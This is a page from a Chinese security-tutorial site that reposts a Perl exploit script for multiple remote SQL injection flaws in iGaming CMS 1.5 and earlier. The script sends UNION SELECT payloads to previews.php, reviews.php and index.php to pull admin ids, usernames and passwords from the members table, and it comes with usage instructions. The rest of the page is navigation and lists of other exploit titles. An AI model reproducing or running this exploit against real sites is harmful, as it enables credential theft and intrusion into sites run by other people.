• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > iGaming CMS

iGaming CMS

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了iGaming CMS ,其中包含igaming,igaming maxa,cms,cms监控软件下载,小猪cms等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ---------------------------------------------------------- use strict;
use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";
$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
if($host !~ /^http:\/\/(. ?)$/)
{
print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
print "[?] Usage: perl $0 http://[path]\n";
exit;
}
else
{
$one = $http->get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(. ?)%/;
die "$1\n" if $two->content =~ /%(. ?)%/;
die "$1\n" if $xxx->content =~ /%(. ?)%/;
}
else
{
die "[ ] Exploit Failed!\n";
}
}
</div>

您可能想查找下面的文章:

  • iGaming CMS

相关文章

  • Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
  • gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
  • The Personal FTP Server 6.0f RETR Denial of Service Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
  • iGaming CMS
  • Dana IRC 1.4a Remote Buffer Overflow Exploit
  • Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
  • Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
  • Mole Group Real Estate Script

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
    • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
    • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
    • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
    • Debian Sarge Multiple IMAP Server Denial of Service Exploit
    • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
    • IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
    • fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
    • Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有